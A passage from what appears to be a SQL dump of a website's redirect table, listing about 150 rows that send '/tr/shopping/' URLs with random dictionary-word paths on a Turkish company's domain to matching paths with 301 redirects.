00:00:00',301),(72581,'https://3s-technologies.com.tr/tr/shopping/hydrogenated/3765798004.html',NULL,'https://3s-technologies.com.tr/shopping/hydrogenated/3765798004.html','',1,0,'2026-06-11 04:49:21','0000-00-00 00:00:00',301),(72582,'https://3s-technologies.com.tr/tr/shopping/nivicola/236410548.html',NULL,'https://3s-technologies.com.tr/shopping/nivicola/236410548.html','',1,0,'2026-06-11 04:49:24','0000-00-00 00:00:00',301),(72583,'https://3s-technologies.com.tr/tr/shopping/nonglutenous/1520780982.html',NULL,'https://3s-technologies.com.tr/shopping/nonglutenous/1520780982.html','',1,0,'2026-06-11 04:49:28','0000-00-00 00:00:00',301),(72584,'https://3s-technologies.com.tr/tr/shopping/disfame/2133785639.html',NULL,'https://3s-technologies.com.tr/shopping/disfame/2133785639.html','',1,0,'2026-06-11 04:49:31','0000-00-00 00:00:00',301),(72585,'https://3s-technologies.com.tr/tr/shopping/xiphiplastra/2310311289.html',NULL,'https://3s-technologies.com.tr/shopping/xiphiplastra/2310311289.html','',1,0,'2026-06-11 04:49:34','0000-00-00 00:00:00',301),(72586,'https://3s-technologies.com.tr/tr/shopping/gibbeted/2521374999.html',NULL,'https://3s-technologies.com.tr/shopping/gibbeted/2521374999.html','',1,0,'2026-06-11 04:49:37','0000-00-00 00:00:00',301),(72587,'https://3s-technologies.com.tr/tr/shopping/funding/2617211281.html',NULL,'https://3s-technologies.com.tr/shopping/funding/2617211281.html','',1,0,'2026-06-11 04:49:40','0000-00-00 00:00:00',301),(72588,'https://3s-technologies.com.tr/tr/shopping/pinchcock/991141773.html',NULL,'https://3s-technologies.com.tr/shopping/pinchcock/991141773.html','',1,0,'2026-06-11 04:49:43','0000-00-00 00:00:00',301),(72589,'https://3s-technologies.com.tr/tr/shopping/woodsy/4129368691.html',NULL,'https://3s-technologies.com.tr/shopping/woodsy/4129368691.html','',1,0,'2026-06-11 04:49:46','0000-00-00 00:00:00',301),(72590,'https://3s-technologies.com.tr/tr/shopping/entomophthoraceae/1954352212.html',NULL,'https://3s-technologies.com.tr/shopping/entomophthoraceae/1954352212.html','',1,0,'2026-06-11 04:49:49','0000-00-00 00:00:00',301),(72591,'https://3s-technologies.com.tr/tr/shopping/photology/1498673633.html',NULL,'https://3s-technologies.com.tr/shopping/photology/1498673633.html','',1,0,'2026-06-11 04:49:53','0000-00-00 00:00:00',301),(72592,'https://3s-technologies.com.tr/tr/shopping/tubulure/3410070671.html',NULL,'https://3s-technologies.com.tr/shopping/tubulure/3410070671.html','',1,0,'2026-06-11 04:49:56','0000-00-00 00:00:00',301),(72593,'https://3s-technologies.com.tr/tr/shopping/inorganity/3159634300.html',NULL,'https://3s-technologies.com.tr/shopping/inorganity/3159634300.html','',1,0,'2026-06-11 04:49:59','0000-00-00 00:00:00',301),(72594,'https://3s-technologies.com.tr/tr/shopping/hippopotamus/3927271427.html',NULL,'https://3s-technologies.com.tr/shopping/hippopotamus/3927271427.html','',1,0,'2026-06-11 04:50:02','0000-00-00 00:00:00',301),(72595,'https://3s-technologies.com.tr/tr/shopping/intervened/2791867774.html',NULL,'https://3s-technologies.com.tr/shopping/intervened/2791867774.html','',1,0,'2026-06-11 04:50:04','0000-00-00 00:00:00',301),(72596,'https://3s-technologies.com.tr/tr/shopping/unifromness/268300439.html',NULL,'https://3s-technologies.com.tr/shopping/unifromness/268300439.html','',1,0,'2026-06-11 04:50:08','0000-00-00 00:00:00',301),(72597,'https://3s-technologies.com.tr/tr/shopping/cavorilievo/4272371046.html',NULL,'https://3s-technologies.com.tr/shopping/cavorilievo/4272371046.html','',1,0,'2026-06-11 04:50:11','0000-00-00 00:00:00',301),(72598,'https://3s-technologies.com.tr/tr/shopping/hobbedehoy/2988985500.html',NULL,'https://3s-technologies.com.tr/shopping/hobbedehoy/2988985500.html','',1,0,'2026-06-11 04:50:14','0000-00-00 00:00:00',301),(72599,'https://3s-technologies.com.tr/tr/shopping/valetudinarian/1288184675.html',NULL,'https://3s-technologies.com.tr/shopping/valetudinarian/1288184675.html','',1,0,'2026-06-11 04:50:19','0000-00-00 00:00:00',301),(72600,'https://3s-technologies.com.tr/tr/shopping/poikilothermic/2774349197.html',NULL,'https://3s-technologies.com.tr/shopping/poikilothermic/2774349197.html','',1,0,'2026-06-11 04:50:21','0000-00-00 00:00:00',301),(72601,'https://3s-technologies.com.tr/tr/shopping/sawtooth/2944211228.html',NULL,'https://3s-technologies.com.tr/shopping/sawtooth/2944211228.html','',1,0,'2026-06-11 04:50:24','0000-00-00 00:00:00',301),(72602,'https://3s-technologies.com.tr/tr/shopping/heterogangliate/3516641954.html',NULL,'https://3s-technologies.com.tr/shopping/heterogangliate/3516641954.html','',1,0,'2026-06-11 04:50:27','0000-00-00 00:00:00',301),(72603,'https://3s-technologies.com.tr/tr/shopping/inexhaustibly/3300611717.html',NULL,'https://3s-technologies.com.tr/shopping/inexhaustibly/3300611717.html','',1,0,'2026-06-11 04:50:30','0000-00-00 00:00:00',301),(72604,'https://3s-technologies.com.tr/tr/shopping/heteropelmous/3613216511.html',NULL,'https://3s-technologies.com.tr/shopping/heteropelmous/3613216511.html','',1,0,'2026-06-11 04:50:33','0000-00-00 00:00:00',301),(72605,'https://3s-technologies.com.tr/tr/shopping/woodenly/1478549039.html',NULL,'https://3s-technologies.com.tr/shopping/woodenly/1478549039.html','',1,0,'2026-06-11 04:50:36','0000-00-00 00:00:00',301),(72606,'https://3s-technologies.com.tr/tr/shopping/isosporic/3450530989.html',NULL,'https://3s-technologies.com.tr/shopping/isosporic/3450530989.html','',1,0,'2026-06-11 04:50:41','0000-00-00 00:00:00',301),(72607,'https://3s-technologies.com.tr/tr/shopping/unossified/1377615120.html',NULL,'https://3s-technologies.com.tr/shopping/unossified/1377615120.html','',1,0,'2026-06-11 04:50:43','0000-00-00 00:00:00',301),(72608,'https://3s-technologies.com.tr/tr/shopping/immaculateness/4179173178.html',NULL,'https://3s-technologies.com.tr/shopping/immaculateness/4179173178.html','',1,0,'2026-06-11 04:50:46','0000-00-00 00:00:00',301),(72609,'https://3s-technologies.com.tr/tr/shopping/leontopetalum/1919692797.html',NULL,'https://3s-technologies.com.tr/shopping/leontopetalum/1919692797.html','',1,0,'2026-06-11 04:50:49','0000-00-00 00:00:00',301),(72610,'https://3s-technologies.com.tr/tr/shopping/breathableness/902759920.html',NULL,'https://3s-technologies.com.tr/shopping/breathableness/902759920.html','',1,0,'2026-06-11 04:50:52','0000-00-00 00:00:00',301),(72611,'https://3s-technologies.com.tr/tr/shopping/mydaleine/4256064568.html',NULL,'https://3s-technologies.com.tr/shopping/mydaleine/4256064568.html','',1,0,'2026-06-11 04:50:55','0000-00-00 00:00:00',301),(72612,'https://3s-technologies.com.tr/tr/shopping/hospitaler/3982055468.html',NULL,'https://3s-technologies.com.tr/shopping/hospitaler/3982055468.html','',1,0,'2026-06-11 04:50:58','0000-00-00 00:00:00',301),(72613,'https://3s-technologies.com.tr/tr/shopping/humoralist/1188626378.html',NULL,'https://3s-technologies.com.tr/shopping/humoralist/1188626378.html','',1,0,'2026-06-11 04:51:05','0000-00-00 00:00:00',301),(72614,'https://3s-technologies.com.tr/tr/shopping/tirewoman/2780313591.html',NULL,'https://3s-technologies.com.tr/shopping/tirewoman/2780313591.html','',1,0,'2026-06-11 04:51:10','0000-00-00 00:00:00',301),(72615,'https://3s-technologies.com.tr/tr/shopping/sporophila/539959905.html',NULL,'https://3s-technologies.com.tr/shopping/sporophila/539959905.html','',1,0,'2026-06-11 04:51:13','0000-00-00 00:00:00',301),(72616,'https://3s-technologies.com.tr/tr/shopping/xylophagan/1553016215.html',NULL,'https://3s-technologies.com.tr/shopping/xylophagan/1553016215.html','',1,0,'2026-06-11 04:51:16','0000-00-00 00:00:00',301),(72617,'https://3s-technologies.com.tr/tr/shopping/youthhood/154977977.html',NULL,'https://3s-technologies.com.tr/shopping/youthhood/154977977.html','',1,0,'2026-06-11 04:51:19','0000-00-00 00:00:00',301),(72618,'https://3s-technologies.com.tr/tr/shopping/coadjutive/1599836978.html',NULL,'https://3s-technologies.com.tr/shopping/coadjutive/1599836978.html','',1,0,'2026-06-11 04:51:22','0000-00-00 00:00:00',301),(72619,'https://3s-technologies.com.tr/tr/shopping/unifilar/2753012488.html',NULL,'https://3s-technologies.com.tr/shopping/unifilar/2753012488.html','',1,0,'2026-06-11 04:51:25','0000-00-00 00:00:00',301),(72620,'https://3s-technologies.com.tr/tr/shopping/capellmeister/1656236879.html',NULL,'https://3s-technologies.com.tr/shopping/capellmeister/1656236879.html','',1,0,'2026-06-11 04:51:31','0000-00-00 00:00:00',301),(72621,'https://3s-technologies.com.tr/tr/shopping/pennatulas/706185623.html',NULL,'https://3s-technologies.com.tr/shopping/pennatulas/706185623.html','',1,0,'2026-06-11 04:51:33','0000-00-00 00:00:00',301),(72622,'https://3s-technologies.com.tr/tr/shopping/paraquet/2198987711.html',NULL,'https://3s-technologies.com.tr/shopping/paraquet/2198987711.html','',1,0,'2026-06-11 04:51:36','0000-00-00 00:00:00',301),(72623,'https://3s-technologies.com.tr/tr/shopping/cellularity/1456224754.html',NULL,'https://3s-technologies.com.tr/shopping/cellularity/1456224754.html','',1,0,'2026-06-11 04:51:40','0000-00-00 00:00:00',301),(72624,'https://3s-technologies.com.tr/tr/shopping/enhanced/3398677307.html',NULL,'https://3s-technologies.com.tr/shopping/enhanced/3398677307.html','',1,0,'2026-06-11 04:51:43','0000-00-00 00:00:00',301),(72625,'https://3s-technologies.com.tr/tr/shopping/nutter/2972232660.html',NULL,'https://3s-technologies.com.tr/shopping/nutter/2972232660.html','',1,0,'2026-06-11 04:51:46','0000-00-00 00:00:00',301),(72626,'https://3s-technologies.com.tr/tr/shopping/devonian/1831028105.html',NULL,'https://3s-technologies.com.tr/shopping/devonian/1831028105.html','',1,0,'2026-06-11 04:51:49','0000-00-00 00:00:00',301),(72627,'https://3s-technologies.com.tr/tr/shopping/attribute/4167779814.html',NULL,'https://3s-technologies.com.tr/shopping/attribute/4167779814.html','',1,0,'2026-06-11 04:51:52','0000-00-00 00:00:00',301),(72628,'https://3s-technologies.com.tr/tr/shopping/spirometer/1951318161.html',NULL,'https://3s-technologies.com.tr/shopping/spirometer/1951318161.html','',1,0,'2026-06-11 04:51:55','0000-00-00 00:00:00',301),(72629,'https://3s-technologies.com.tr/tr/shopping/likelihood/28113658.html',NULL,'https://3s-technologies.com.tr/shopping/likelihood/28113658.html','',1,0,'2026-06-11 04:51:58','0000-00-00 00:00:00',301),(72630,'https://3s-technologies.com.tr/tr/shopping/unity/1314434498.html',NULL,'https://3s-technologies.com.tr/shopping/unity/1314434498.html','',1,0,'2026-06-11 04:52:01','0000-00-00 00:00:00',301),(72631,'https://3s-technologies.com.tr/tr/shopping/changeringing/812571.html',NULL,'https://3s-technologies.com.tr/shopping/changeringing/812571.html','',1,0,'2026-06-11 04:52:04','0000-00-00 00:00:00',301),(72632,'https://3s-technologies.com.tr/tr/shopping/systematizing/780206469.html',NULL,'https://3s-technologies.com.tr/shopping/systematizing/780206469.html','',1,0,'2026-06-11 04:52:07','0000-00-00 00:00:00',301),(72633,'https://3s-technologies.com.tr/tr/shopping/quantification/2313078125.html',NULL,'https://3s-technologies.com.tr/shopping/quantification/2313078125.html','',1,0,'2026-06-11 04:52:10','0000-00-00 00:00:00',301),(72634,'https://3s-technologies.com.tr/tr/shopping/flexing/3772105052.html',NULL,'https://3s-technologies.com.tr/shopping/flexing/3772105052.html','',1,0,'2026-06-11 04:52:13','0000-00-00 00:00:00',301),(72635,'https://3s-technologies.com.tr/tr/shopping/lambkill/127016328.html',NULL,'https://3s-technologies.com.tr/shopping/lambkill/127016328.html','',1,0,'2026-06-11 04:52:16','0000-00-00 00:00:00',301),(72636,'https://3s-technologies.com.tr/tr/shopping/processed/487865969.html',NULL,'https://3s-technologies.com.tr/shopping/processed/487865969.html','',1,0,'2026-06-11 04:52:19','0000-00-00 00:00:00',301),(72637,'https://3s-technologies.com.tr/tr/shopping/compacter/81244173.html',NULL,'https://3s-technologies.com.tr/shopping/compacter/81244173.html','',1,0,'2026-06-11 04:52:22','0000-00-00 00:00:00',301),(72638,'https://3s-technologies.com.tr/tr/shopping/expected/340111287.html',NULL,'https://3s-technologies.com.tr/shopping/expected/340111287.html','',1,0,'2026-06-11 04:52:25','0000-00-00 00:00:00',301),(72639,'https://3s-technologies.com.tr/tr/shopping/threadfish/665553809.html',NULL,'https://3s-technologies.com.tr/shopping/threadfish/665553809.html','',1,0,'2026-06-11 04:52:28','0000-00-00 00:00:00',301),(72640,'https://3s-technologies.com.tr/tr/shopping/vesicated/364988208.html',NULL,'https://3s-technologies.com.tr/shopping/vesicated/364988208.html','',1,0,'2026-06-11 04:52:31','0000-00-00 00:00:00',301),(72641,'https://3s-technologies.com.tr/tr/shopping/automatic/278361899.html',NULL,'https://3s-technologies.com.tr/shopping/automatic/278361899.html','',1,0,'2026-06-11 04:52:34','0000-00-00 00:00:00',301),(72642,'https://3s-technologies.com.tr/tr/shopping/foreknowledge/4077956436.html',NULL,'https://3s-technologies.com.tr/shopping/foreknowledge/4077956436.html','',1,0,'2026-06-11 04:52:37','0000-00-00 00:00:00',301),(72643,'https://3s-technologies.com.tr/tr/shopping/truthteller/2877263167.html',NULL,'https://3s-technologies.com.tr/shopping/truthteller/2877263167.html','',1,0,'2026-06-11 04:52:40','0000-00-00 00:00:00',301),(72644,'https://3s-technologies.com.tr/tr/shopping/methodistically/3418801901.html',NULL,'https://3s-technologies.com.tr/shopping/methodistically/3418801901.html','',1,0,'2026-06-11 04:52:43','0000-00-00 00:00:00',301),(72645,'https://3s-technologies.com.tr/tr/shopping/tempse/1509829045.html',NULL,'https://3s-technologies.com.tr/shopping/tempse/1509829045.html','',1,0,'2026-06-11 04:52:46','0000-00-00 00:00:00',301),(72646,'https://3s-technologies.com.tr/tr/shopping/hinging/350664485.html',NULL,'https://3s-technologies.com.tr/shopping/hinging/350664485.html','',1,0,'2026-06-11 04:52:49','0000-00-00 00:00:00',301),(72647,'https://3s-technologies.com.tr/tr/shopping/beached/3891391908.html',NULL,'https://3s-technologies.com.tr/shopping/beached/3891391908.html','',1,0,'2026-06-11 04:52:52','0000-00-00 00:00:00',301),(72648,'https://3s-technologies.com.tr/tr/shopping/replying/1121678333.html',NULL,'https://3s-technologies.com.tr/shopping/replying/1121678333.html','',1,0,'2026-06-11 04:52:55','0000-00-00 00:00:00',301),(72649,'https://3s-technologies.com.tr/tr/shopping/spawn/3020610864.html',NULL,'https://3s-technologies.com.tr/shopping/spawn/3020610864.html','',1,0,'2026-06-11 04:52:58','0000-00-00 00:00:00',301),(72650,'https://3s-technologies.com.tr/tr/shopping/methionic/438882831.html',NULL,'https://3s-technologies.com.tr/shopping/methionic/438882831.html','',1,0,'2026-06-11 04:53:01','0000-00-00 00:00:00',301),(72651,'https://3s-technologies.com.tr/tr/shopping/compotation/1031155745.html',NULL,'https://3s-technologies.com.tr/shopping/compotation/1031155745.html','',1,0,'2026-06-11 04:53:04','0000-00-00 00:00:00',301),(72652,'https://3s-technologies.com.tr/tr/shopping/versatile/3251364052.html',NULL,'https://3s-technologies.com.tr/shopping/versatile/3251364052.html','',1,0,'2026-06-11 04:53:07','0000-00-00 00:00:00',301),(72653,'https://3s-technologies.com.tr/tr/shopping/suffumigate/1755185307.html',NULL,'https://3s-technologies.com.tr/shopping/suffumigate/1755185307.html','',1,0,'2026-06-11 04:53:10','0000-00-00 00:00:00',301),(72654,'https://3s-technologies.com.tr/tr/shopping/grape/763899991.html',NULL,'https://3s-technologies.com.tr/shopping/grape/763899991.html','',1,0,'2026-06-11 04:53:14','0000-00-00 00:00:00',301),(72655,'https://3s-technologies.com.tr/tr/shopping/predestination/371559751.html',NULL,'https://3s-technologies.com.tr/shopping/predestination/371559751.html','',1,0,'2026-06-11 04:53:17','0000-00-00 00:00:00',301),(72656,'https://3s-technologies.com.tr/tr/shopping/stranding/2024670.html',NULL,'https://3s-technologies.com.tr/shopping/stranding/2024670.html','',1,0,'2026-06-11 04:53:19','0000-00-00 00:00:00',301),(72657,'https://3s-technologies.com.tr/tr/shopping/percolating/3581091404.html',NULL,'https://3s-technologies.com.tr/shopping/percolating/3581091404.html','',1,0,'2026-06-11 04:53:23','0000-00-00 00:00:00',301),(72658,'https://3s-technologies.com.tr/tr/shopping/taking/3096062928.html',NULL,'https://3s-technologies.com.tr/shopping/taking/3096062928.html','',1,0,'2026-06-11 04:53:28','0000-00-00 00:00:00',301),(72659,'https://3s-technologies.com.tr/tr/shopping/secure/311252743.html',NULL,'https://3s-technologies.com.tr/shopping/secure/311252743.html','',1,0,'2026-06-11 04:53:31','0000-00-00 00:00:00',301),(72660,'https://3s-technologies.com.tr/tr/shopping/consortion/58350023.html',NULL,'https://3s-technologies.com.tr/shopping/consortion/58350023.html','',1,0,'2026-06-11 04:53:34','0000-00-00 00:00:00',301),(72661,'https://3s-technologies.com.tr/tr/shopping/misgraff/1173085653.html',NULL,'https://3s-technologies.com.tr/shopping/misgraff/1173085653.html','',1,0,'2026-06-11 04:53:37','0000-00-00 00:00:00',301),(72662,'https://3s-technologies.com.tr/tr/shopping/bacilli/3310458977.html',NULL,'https://3s-technologies.com.tr/shopping/bacilli/3310458977.html','',1,0,'2026-06-11 04:53:40','0000-00-00 00:00:00',301),(72663,'https://3s-technologies.com.tr/tr/shopping/hypnum/3612770149.html',NULL,'https://3s-technologies.com.tr/shopping/hypnum/3612770149.html','',1,0,'2026-06-11 04:53:43','0000-00-00 00:00:00',301),(72664,'https://3s-technologies.com.tr/tr/shopping/bisectrix/1488492368.html',NULL,'https://3s-technologies.com.tr/shopping/bisectrix/1488492368.html','',1,0,'2026-06-11 04:53:46','0000-00-00 00:00:00',301),(72665,'https://3s-technologies.com.tr/tr/shopping/affinal/1049463274.html',NULL,'https://3s-technologies.com.tr/shopping/affinal/1049463274.html','',1,0,'2026-06-11 04:53:49','0000-00-00 00:00:00',301),(72666,'https://3s-technologies.com.tr/tr/shopping/consignatory/3210597489.html',NULL,'https://3s-technologies.com.tr/shopping/consignatory/3210597489.html','',1,0,'2026-06-11 04:53:52','0000-00-00 00:00:00',301),(72667,'https://3s-technologies.com.tr/tr/shopping/querimoniousness/768488795.html',NULL,'https://3s-technologies.com.tr/shopping/querimoniousness/768488795.html','',1,0,'2026-06-11 04:53:55','0000-00-00 00:00:00',301),(72668,'https://3s-technologies.com.tr/tr/shopping/astral/226574641.html',NULL,'https://3s-technologies.com.tr/shopping/astral/226574641.html','',1,0,'2026-06-11 04:54:01','0000-00-00 00:00:00',301),(72669,'https://3s-technologies.com.tr/tr/shopping/monopode/1806921888.html',NULL,'https://3s-technologies.com.tr/shopping/monopode/1806921888.html','',1,0,'2026-06-11 04:54:04','0000-00-00 00:00:00',301),(72670,'https://3s-technologies.com.tr/tr/shopping/aliunde/2800599004.html',NULL,'https://3s-technologies.com.tr/shopping/aliunde/2800599004.html','',1,0,'2026-06-11 04:54:07','0000-00-00 00:00:00',301),(72671,'https://3s-technologies.com.tr/tr/shopping/sleekly/2170075754.html',NULL,'https://3s-technologies.com.tr/shopping/sleekly/2170075754.html','',1,0,'2026-06-11 04:54:10','0000-00-00 00:00:00',301),(72672,'https://3s-technologies.com.tr/tr/shopping/undesigning/3913895308.html',NULL,'https://3s-technologies.com.tr/shopping/undesigning/3913895308.html','',1,0,'2026-06-11 04:54:14','0000-00-00 00:00:00',301),(72673,'https://3s-technologies.com.tr/tr/shopping/attempted/1430740700.html',NULL,'https://3s-technologies.com.tr/shopping/attempted/1430740700.html','',1,0,'2026-06-11 04:54:16','0000-00-00 00:00:00',301),(72674,'https://3s-technologies.com.tr/tr/shopping/perimorph/3623323347.html',NULL,'https://3s-technologies.com.tr/shopping/perimorph/3623323347.html','',1,0,'2026-06-11 04:54:19','0000-00-00 00:00:00',301),(72675,'https://3s-technologies.com.tr/tr/shopping/interlaminated/3938426855.html',NULL,'https://3s-technologies.com.tr/shopping/interlaminated/3938426855.html','',1,0,'2026-06-11 04:54:22','0000-00-00 00:00:00',301),(72676,'https://3s-technologies.com.tr/tr/shopping/indifulvin/593251191.html',NULL,'https://3s-technologies.com.tr/shopping/indifulvin/593251191.html','',1,0,'2026-06-11 04:54:26','0000-00-00 00:00:00',301),(72677,'https://3s-technologies.com.tr/tr/shopping/arrested/3166200940.html',NULL,'https://3s-technologies.com.tr/shopping/arrested/3166200940.html','',1,0,'2026-06-11 04:54:29','0000-00-00 00:00:00',301),(72678,'https://3s-technologies.com.tr/tr/shopping/misnumber/1855300076.html',NULL,'https://3s-technologies.com.tr/shopping/misnumber/1855300076.html','',1,0,'2026-06-11 04:54:31','0000-00-00 00:00:00',301),(72679,'https://3s-technologies.com.tr/tr/shopping/frrezingly/3782658234.html',NULL,'https://3s-technologies.com.tr/shopping/frrezingly/3782658234.html','',1,0,'2026-06-11 04:54:34','0000-00-00 00:00:00',301),(72680,'https://3s-technologies.com.tr/tr/shopping/rapper/3209385390.html',NULL,'https://3s-technologies.com.tr/shopping/rapper/3209385390.html','',1,0,'2026-06-11 04:54:37','0000-00-00 00:00:00',301),(72681,'https://3s-technologies.com.tr/tr/shopping/espial/3215349784.html',NULL,'https://3s-technologies.com.tr/shopping/espial/3215349784.html','',1,0,'2026-06-11 04:54:40','0000-00-00 00:00:00',301),(72682,'https://3s-technologies.com.tr/tr/shopping/viscidity/1436541571.html',NULL,'https://3s-technologies.com.tr/shopping/viscidity/1436541571.html','',1,0,'2026-06-11 04:54:43','0000-00-00 00:00:00',301),(72683,'https://3s-technologies.com.tr/tr/shopping/posologic/1329970304.html',NULL,'https://3s-technologies.com.tr/shopping/posologic/1329970304.html','',1,0,'2026-06-11 04:54:46','0000-00-00 00:00:00',301),(72684,'https://3s-technologies.com.tr/tr/shopping/preface/4208799674.html',NULL,'https://3s-technologies.com.tr/shopping/preface/4208799674.html','',1,0,'2026-06-11 04:54:49','0000-00-00 00:00:00',301),(72685,'https://3s-technologies.com.tr/tr/shopping/misreport/4243622628.html',NULL,'https://3s-technologies.com.tr/shopping/misreport/4243622628.html','',1,0,'2026-06-11 04:54:53','0000-00-00 00:00:00',301),(72686,'https://3s-technologies.com.tr/tr/shopping/straggled/977324195.html',NULL,'https://3s-technologies.com.tr/shopping/straggled/977324195.html','',1,0,'2026-06-11 04:54:56','0000-00-00 00:00:00',301),(72687,'https://3s-technologies.com.tr/tr/shopping/chamosite/1761149701.html',NULL,'https://3s-technologies.com.tr/shopping/chamosite/1761149701.html','',1,0,'2026-06-11 04:54:58','0000-00-00 00:00:00',301),(72688,'https://3s-technologies.com.tr/tr/shopping/chide/422576353.html',NULL,'https://3s-technologies.com.tr/shopping/chide/422576353.html','',1,0,'2026-06-11 04:55:02','0000-00-00 00:00:00',301),(72689,'https://3s-technologies.com.tr/tr/shopping/bribeless/2631040148.html',NULL,'https://3s-technologies.com.tr/shopping/bribeless/2631040148.html','',1,0,'2026-06-11 04:55:04','0000-00-00 00:00:00',301),(72690,'https://3s-technologies.com.tr/tr/shopping/grounds/3351478821.html',NULL,'https://3s-technologies.com.tr/shopping/grounds/3351478821.html','',1,0,'2026-06-11 04:55:08','0000-00-00 00:00:00',301),(72691,'https://3s-technologies.com.tr/tr/shopping/runaway/733040396.html',NULL,'https://3s-technologies.com.tr/shopping/runaway/733040396.html','',1,0,'2026-06-11 04:55:10','0000-00-00 00:00:00',301),(72692,'https://3s-technologies.com.tr/tr/shopping/finative/3230027375.html',NULL,'https://3s-technologies.com.tr/shopping/finative/3230027375.html','',1,0,'2026-06-11 04:55:14','0000-00-00 00:00:00',301),(72693,'https://3s-technologies.com.tr/tr/shopping/vively/293897689.html',NULL,'https://3s-technologies.com.tr/shopping/vively/293897689.html','',1,0,'2026-06-11 04:55:16','0000-00-00 00:00:00',301),(72694,'https://3s-technologies.com.tr/tr/shopping/gaduin/2783243950.html',NULL,'https://3s-technologies.com.tr/shopping/gaduin/2783243950.html','',1,0,'2026-06-11 04:55:20','0000-00-00 00:00:00',301),(72695,'https://3s-technologies.com.tr/tr/shopping/wizen/2484497597.html',NULL,'https://3s-technologies.com.tr/shopping/wizen/2484497597.html','',1,0,'2026-06-11 04:55:22','0000-00-00 00:00:00',301),(72696,'https://3s-technologies.com.tr/tr/shopping/cacajo/507549136.html',NULL,'https://3s-technologies.com.tr/shopping/cacajo/507549136.html','',1,0,'2026-06-11 04:55:26','0000-00-00 00:00:00',301),(72697,'https://3s-technologies.com.tr/tr/shopping/configuration/3800013288.html',NULL,'https://3s-technologies.com.tr/shopping/configuration/3800013288.html','',1,0,'2026-06-11 04:55:29','0000-00-00 00:00:00',301),(72698,'https://3s-technologies.com.tr/tr/shopping/suscipiency/1151748976.html',NULL,'https://3s-technologies.com.tr/shopping/suscipiency/1151748976.html','',1,0,'2026-06-11 04:55:32','0000-00-00 00:00:00',301),(72699,'https://3s-technologies.com.tr/tr/shopping/soberly/2990703744.html',NULL,'https://3s-technologies.com.tr/shopping/soberly/2990703744.html','',1,0,'2026-06-11 04:55:35','0000-00-00 00:00:00',301),(72700,'https://3s-technologies.com.tr/tr/shopping/suspender/973783999.html',NULL,'https://3s-technologies.com.tr/shopping/suspender/973783999.html','',1,0,'2026-06-11 04:55:38','0000-00-00 00:00:00',301),(72701,'https://3s-technologies.com.tr/tr/shopping/subduer/2779867261.html',NULL,'https://3s-technologies.com.tr/shopping/subduer/2779867261.html','',1,0,'2026-06-11 04:55:41','0000-00-00 00:00:00',301),(72702,'https://3s-technologies.com.tr/tr/shopping/leftish/3690646427.html',NULL,'https://3s-technologies.com.tr/shopping/leftish/3690646427.html','',1,0,'2026-06-11 04:55:44','0000-00-00 00:00:00',301),(72703,'https://3s-technologies.com.tr/tr/shopping/chords/1370203379.html',NULL,'https://3s-technologies.com.tr/shopping/chords/1370203379.html','',1,0,'2026-06-11 04:55:47','0000-00-00 00:00:00',301),(72704,'https://3s-technologies.com.tr/tr/shopping/germinative/3739024599.html',NULL,'https://3s-technologies.com.tr/shopping/germinative/3739024599.html','',1,0,'2026-06-11 04:55:50','0000-00-00 00:00:00',301),(72705,'https://3s-technologies.com.tr/tr/shopping/karroos/2825690109.html',NULL,'https://3s-technologies.com.tr/shopping/karroos/2825690109.html','',1,0,'2026-06-11 04:55:53','0000-00-00 00:00:00',301),(72706,'https://3s-technologies.com.tr/tr/shopping/oppressed/1917870829.html',NULL,'https://3s-technologies.com.tr/shopping/oppressed/1917870829.html','',1,0,'2026-06-11 04:55:56','0000-00-00 00:00:00',301),(72707,'https://3s-technologies.com.tr/tr/shopping/knarled/2945929472.html',NULL,'https://3s-technologies.com.tr/shopping/knarled/2945929472.html','',1,0,'2026-06-11 04:55:59','0000-00-00 00:00:00',301),(72708,'https://3s-technologies.com.tr/tr/shopping/consummation/4081333125.html',NULL,'https://3s-technologies.com.tr/shopping/consummation/4081333125.html','',1,0,'2026-06-11 04:56:02','0000-00-00 00:00:00',301),(72709,'https://3s-technologies.com.tr/tr/shopping/faculties/3869891708.html',NULL,'https://3s-technologies.com.tr/shopping/faculties/3869891708.html','',1,0,'2026-06-11 04:56:05','0000-00-00 00:00:00',301),(72710,'https://3s-technologies.com.tr/tr/shopping/sizable/3744989025.html',NULL,'https://3s-technologies.com.tr/shopping/sizable/3744989025.html','',1,0,'2026-06-11 04:56:08','0000-00-00 00:00:00',301),(72711,'https://3s-technologies.com.tr/tr/shopping/divorced/2594216143.html',NULL,'https://3s-technologies.com.tr/shopping/divorced/2594216143.html','',1,0,'2026-06-11 04:56:11','0000-00-00 00:00:00',301),(72712,'https://3s-technologies.com.tr/tr/shopping/corinne/3521996495.html',NULL,'https://3s-technologies.com.tr/shopping/corinne/3521996495.html','',1,0,'2026-06-11 04:56:14','0000-00-00 00:00:00',301),(72713,'https://3s-technologies.com.tr/tr/shopping/brainish/963441931.html',NULL,'https://3s-technologies.com.tr/shopping/brainish/963441931.html','',1,0,'2026-06-11 04:56:17','0000-00-00 00:00:00',301),(72714,'https://3s-technologies.com.tr/tr/shopping/alchemic/3023198569.html',NULL,'https://3s-technologies.com.tr/shopping/alchemic/3023198569.html','',1,0,'2026-06-11 04:56:20','0000-00-00 00:00:00',301),(72715,'https://3s-technologies.com.tr/tr/shopping/harrower/3971874203.html',NULL,'https://3s-technologies.com.tr/shopping/harrower/3971874203.html','',1,0,'2026-06-11 04:56:23','0000-00-00 00:00:00',301),(72716,'https://3s-technologies.com.tr/tr/shopping/parkia/835975366.html',NULL,'https://3s-technologies.com.tr/shopping/parkia/835975366.html','',1,0,'2026-06-11 04:56:26','0000-00-00 00:00:00',301),(72717,'https://3s-technologies.com.tr/tr/shopping/pyebald/922598913.html',NULL,'https://3s-technologies.com.tr/shopping/pyebald/922598913.html','',1,0,'2026-06-11 04:56:31','0000-00-00 00:00:00',301),(72718,'https://3s-technologies.com.tr/tr/shopping/acaroidea/1607140002.html',NULL,'https://3s-technologies.com.tr/shopping/acaroidea/1607140002.html','',1,0,'2026-06-11 04:56:36','0000-00-00 00:00:00',301),(72719,'https://3s-technologies.com.tr/tr/shopping/eurypteroid/3466227598.html',NULL,'https://3s-technologies.com.tr/shopping/eurypteroid/3466227598.html','',1,0,'2026-06-11 04:56:39','0000-00-00 00:00:00',301),(72720,'https://3s-technologies.com.tr/tr/shopping/argue/3026575258.html',NULL,'https://3s-technologies.com.tr/shopping/argue/3026575258.html','',1,0,'2026-06-11 04:56:42','0000-00-00 00:00:00',301),(72721,'https://3s-technologies.com.tr/tr/shopping/positively/4284642488.html',NULL,'https://3s-technologies.com.tr/shopping/positively/4284642488.html','',1,0,'2026-06-11 04:56:45','0000-00-00 